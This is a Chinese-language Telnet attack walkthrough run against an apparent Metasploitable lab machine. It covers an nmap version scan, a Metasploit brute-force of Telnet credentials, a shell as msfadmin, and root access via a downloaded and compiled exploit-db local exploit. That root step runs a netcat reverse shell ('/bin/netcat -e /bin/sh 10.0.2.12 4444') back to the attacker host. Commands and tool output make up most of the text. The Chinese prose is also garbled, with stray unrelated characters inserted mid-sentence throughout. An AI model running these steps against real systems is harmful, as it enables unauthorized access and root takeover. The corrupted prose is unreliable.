Telnet是一個(gè)明文傳送協(xié)議，它將用戶的所有內(nèi)容项棠，包括用戶名和密碼都明文在互聯(lián)網(wǎng)上傳送拉队，具有一定的安全隱患秆乳，因此許多服務(wù)器都會選擇禁用Telnet服務(wù)

Telnet協(xié)議是TCP/IP協(xié)議族中的一員般妙，是Internet遠(yuǎn)程登陸服務(wù)的標(biāo)準(zhǔn)協(xié)議和主要方式纪铺。它為用戶提供了在本地計(jì)算機(jī)上完成遠(yuǎn)程主機(jī)工作的能力。在終端使用者的電腦上使用telnet程序碟渺，用它連接到服務(wù)器鲜锚。終端使用者可以在telnet程序中輸入命令，這些命令會在服務(wù)器上運(yùn)行苫拍，就像直接在服務(wù)器的控制臺上輸入一樣芜繁。

雖然Telnet較為簡單實(shí)用也很方便，但是在格外注重安全的現(xiàn)代網(wǎng)絡(luò)技術(shù)中绒极，Telnet并不被重用骏令。原因在于Telnet是一個(gè)明文傳送協(xié)議，它將用戶的所有內(nèi)容垄提，包括用戶名和密碼都明文在互聯(lián)網(wǎng)上傳送榔袋，具有一定的安全隱患，因此許多服務(wù)器都會選擇禁用Telnet服務(wù)铡俐。如果我們要使用Telnet的遠(yuǎn)程登錄凰兑，使用前應(yīng)在遠(yuǎn)端服務(wù)器上檢查并設(shè)置允許Telnet服務(wù)的功能。

Telnet服務(wù)端默認(rèn)情況下使用23端口审丘。

Telnet版本獲取

利用Telnet漏洞吏够，首先需要了解主機(jī)信息，軟件版本信息滩报。從下面探測結(jié)果稿饰，可以看出是一臺linux機(jī)器。

?  ~ nmap -p23 -sV 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:42 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00026s latency).

PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds

Telnet密碼破解

下面使用metasploit對telnet進(jìn)行用戶名和密碼的破解露泊。

1、登錄msfconsole

?  ~ msfconsole 
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

msf5 > 

2旅择、使用search telnet進(jìn)行查詢telnet可以利用的模塊

msf5 > search  telnet

Matching Modules
================

   Name                                                               Disclosure Date  Rank       Check  Description
   ----                                                               ---------------  ----       -----  -----------
   auxiliary/admin/http/dlink_dir_300_600_exec_noauth                 2013-02-04       normal     No     D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
   auxiliary/dos/cisco/ios_telnet_rocem                               2017-03-17       normal     No     Cisco IOS Telnet Denial of Service
   auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof                       2010-12-21       normal     No     Microsoft IIS FTP Server Encoded Response Overflow Trigger
   auxiliary/scanner/ssh/juniper_backdoor                             2015-12-20       normal     Yes    Juniper SSH Backdoor Scanner
   auxiliary/scanner/telnet/brocade_enable_login                                       normal     Yes    Brocade Enable Login Check Scanner
   auxiliary/scanner/telnet/lantronix_telnet_password                                  normal     Yes    Lantronix Telnet Password Recovery
   auxiliary/scanner/telnet/lantronix_telnet_version                                   normal     Yes    Lantronix Telnet Service Banner Detection
   auxiliary/scanner/telnet/satel_cmd_exec                            2017-04-07       normal     Yes    Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability
   auxiliary/scanner/telnet/telnet_encrypt_overflow                                    normal     Yes    Telnet Service Encryption Key ID Overflow Detection
   auxiliary/scanner/telnet/telnet_login                                               normal     Yes    Telnet Login Check Scanner
   auxiliary/scanner/telnet/telnet_ruggedcom                                           normal     Yes    RuggedCom Telnet Password Generator
   auxiliary/scanner/telnet/telnet_version                                             normal     Yes    Telnet Service Banner Detection
   auxiliary/server/capture/telnet                                                     normal     No     Authentication Capture: Telnet
   exploit/freebsd/ftp/proftp_telnet_iac                              2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/freebsd/telnet/telnet_encrypt_keyid                        2011-12-23       great      No     FreeBSD Telnet Service Encryption Key ID Buffer Overflow
   exploit/linux/ftp/proftp_telnet_iac                                2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/http/asuswrt_lan_rce                                 2018-01-22       excellent  No     AsusWRT LAN Unauthenticated Remote Code Execution
   exploit/linux/http/dlink_diagnostic_exec_noauth                    2013-03-05       excellent  No     D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
   exploit/linux/http/dlink_dir300_exec_telnet                        2013-04-22       excellent  No     D-Link Devices Unauthenticated Remote Command Execution
   exploit/linux/http/huawei_hg532n_cmdinject                         2017-04-15       excellent  Yes    Huawei HG532n Command Injection
   exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection  2015-12-20       excellent  No     TP-Link SC2020n Authenticated Telnet Injection
   exploit/linux/misc/asus_infosvr_auth_bypass_exec                   2015-01-04       excellent  No     ASUS infosvr Auth Bypass Command Execution
   exploit/linux/misc/hp_jetdirect_path_traversal                     2017-04-05       normal     No     HP Jetdirect Path Traversal Arbitrary Code Execution
   exploit/linux/telnet/netgear_telnetenable                          2009-10-30       excellent  Yes    NETGEAR TelnetEnable
   exploit/linux/telnet/telnet_encrypt_keyid                          2011-12-23       great      No     Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
   exploit/solaris/telnet/fuser                                       2007-02-12       excellent  No     Sun Solaris Telnet Remote Authentication Bypass Vulnerability
   exploit/solaris/telnet/ttyprompt                                   2002-01-18       excellent  No     Solaris in.telnetd TTYPROMPT Buffer Overflow
   exploit/unix/misc/polycom_hdx_auth_bypass                          2013-01-18       normal     Yes    Polycom Command Shell Authorization Bypass
   exploit/unix/misc/polycom_hdx_traceroute_exec                      2017-11-12       excellent  Yes    Polycom Shell HDX Series Traceroute Command Execution
   exploit/unix/polycom_hdx_auth_bypass                               2013-01-18       normal     Yes    Polycom Command Shell Authorization Bypass
   exploit/unix/webapp/dogfood_spell_exec                             2009-03-03       excellent  Yes    Dogfood CRM spell.php Remote Command Execution
   exploit/windows/proxy/ccproxy_telnet_ping                          2004-11-11       average    Yes    CCProxy Telnet Proxy Ping Overflow
   exploit/windows/telnet/gamsoft_telsrv_username                     2000-07-17       average    Yes    GAMSoft TelSrv 1.5 Username Buffer Overflow
   exploit/windows/telnet/goodtech_telnet                             2005-03-15       average    No     GoodTech Telnet Server Buffer Overflow
   payload/cmd/unix/bind_busybox_telnetd                                               normal     No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   payload/cmd/unix/reverse                                                            normal     No     Unix Command Shell, Double Reverse TCP (telnet)
   payload/cmd/unix/reverse_bash_telnet_ssl                                            normal     No     Unix Command Shell, Reverse TCP SSL (telnet)
   payload/cmd/unix/reverse_ssl_double_telnet                                          normal     No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   post/windows/gather/credentials/mremote                                             normal     No     Windows Gather mRemote Saved Password Extraction

3惭笑、選擇一個(gè)暴力破解輔助（auxiliary），并設(shè)置好相應(yīng)參數(shù)

msf5 > use auxiliary/scanner/telnet/telnet_login  
msf5 auxiliary(scanner/telnet/telnet_login) > show options

Module options (auxiliary/scanner/telnet/telnet_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             23               yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/telnet/telnet_login) > set USER
set USERNAME       set USERPASS_FILE  set USER_AS_PASS   set USER_FILE      
msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
USERPASS_FILE => /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set THREADS 5
THREADS => 5
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf5 auxiliary(scanner/telnet/telnet_login) > show options

Module options (auxiliary/scanner/telnet/telnet_login):

   Name              Current Setting                                        Required  Description
   ----              ---------------                                        --------  -----------
   BLANK_PASSWORDS   false                                                  no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                      yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                  no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                  no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                  no        Add all users in the current database to the list
   PASSWORD                                                                 no        A specific password to authenticate with
   PASS_FILE                                                                no        File containing passwords, one per line
   RHOSTS            10.0.2.5                                               yes       The target address range or CIDR identifier
   RPORT             23                                                     yes       The target port (TCP)
   STOP_ON_SUCCESS   false                                                  yes       Stop guessing when a credential works for a host
   THREADS           5                                                      yes       The number of concurrent threads
   USERNAME                                                                 no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/wordlists/metasploit/piata_ssh_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                  no        Try the username as the password for all users
   USER_FILE                                                                no        File containing usernames, one per line
   VERBOSE           true                                                   yes       Whether to print output for all attempts

4生真、最后進(jìn)行破解沉噩，并連接上session

msf5 auxiliary(scanner/telnet/telnet_login) > run

[!] 10.0.2.5:23           - No active DB -- Credential data will not be saved!
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: root:root (Incorrect: )
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: admin:admin (Incorrect: )
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: test:test (Incorrect: )
[+] 10.0.2.5:23           - 10.0.2.5:23 - Login Successful: msfadmin:msfadmin
[*] 10.0.2.5:23           - Attempting to start session 10.0.2.5:23 with msfadmin:msfadmin
[*] Command shell session 1 opened (10.0.2.12:34457 -> 10.0.2.5:23) at 2019-07-11 00:46:41 -0400
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: root:matrix (Incorrect: )
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: ghost:ghost (Incorrect: )
[-] 10.0.2.5:23           - 10.0.2.5:23 - LOGIN FAILED: root:sleeper (Incorrect: )
^C[*] 10.0.2.5:23           - Caught interrupt from the console...
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/telnet/telnet_login) > sessions -l

Active sessions
===============

  Id  Name  Type   Information                             Connection
  --  ----  ----   -----------                             ----------
  1         shell   TELNET msfadmin:msfadmin (10.0.2.5:23)  10.0.2.12:34457 -> 10.0.2.5:23 (10.0.2.5)

msf5 auxiliary(scanner/telnet/telnet_login) > sessions -i 1
[*] Starting interaction with 1...

id
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$ 

登錄提權(quán)

感覺拿到的shell權(quán)限太弱，那下面我們就驗(yàn)證下如何提權(quán)柱蟀。

1川蒙、Kali下載提權(quán)工具exp，并啟動Http服務(wù)长已。

?  ~ cd /var/www/html
?  ~ wget http://www.exploit-db.com/download/8572
?  ~ systemctl start nginx

2畜眨、Kali中啟動NC監(jiān)聽

?  ~ nc -lvp 4444

listening on [any] 4444 ...

3昼牛、通過上面拿到的目標(biāo)主機(jī)shell下載exp

msfadmin@metasploitable:~$ wget http://10.0.2.12/8572
wget http://10.0.2.12/8572
--09:18:28--  http://10.0.2.12/8572
           => `8572'
Connecting to 10.0.2.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,876 (2.8K) [application/octet-stream]

100%[====================================>] 2,876         --.--K/s             

09:18:28 (561.72 KB/s) - `8572' saved [2876/2876]

4、萬事俱備康聂，開始提權(quán)

使用gcc編譯exp贰健，設(shè)置提權(quán)腳本，最后執(zhí)行exp恬汁。
exp參數(shù)：具有root權(quán)限的pid -1

msfadmin@metasploitable:~$ mv 8572 8572.c
mv 8572 8572.c
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ gcc 8572.c -o exploit
gcc 8572.c -o exploit
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ echo '#!/bin/sh' > /tmp/run
echo '#!/bin/sh' > /tmp/run
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ echo '/bin/netcat -e /bin/sh 10.0.2.12 4444' >> /tmp/run
<echo '/bin/netcat -e /bin/sh 10.0.2.12 4444' >> /tmp/run                    
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ ps -edf |grep udev
ps -edf |grep udev
root      2302     1  0 08:48 ?        00:00:00 /sbin/udevd --daemon
msfadmin  4847  4844  0 09:44 pts/1    00:00:00 grep udev
msfadmin@metasploitable:~$ chmod +x exploit
chmod +x exploit
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ ./exploit 2301
./exploit 2301
msfadmin@metasploitable:~$ 

5伶椿、查看Kali中NC監(jiān)聽結(jié)果

?  ~ nc -lvp 4444

listening on [any] 4444 ...


id
10.0.2.5: inverse host lookup failed: Unknown host
connect to [10.0.2.12] from (UNKNOWN) [10.0.2.5] 50536
uid=0(root) gid=0(root)

推薦匯總貼： 漏洞利用套路匯總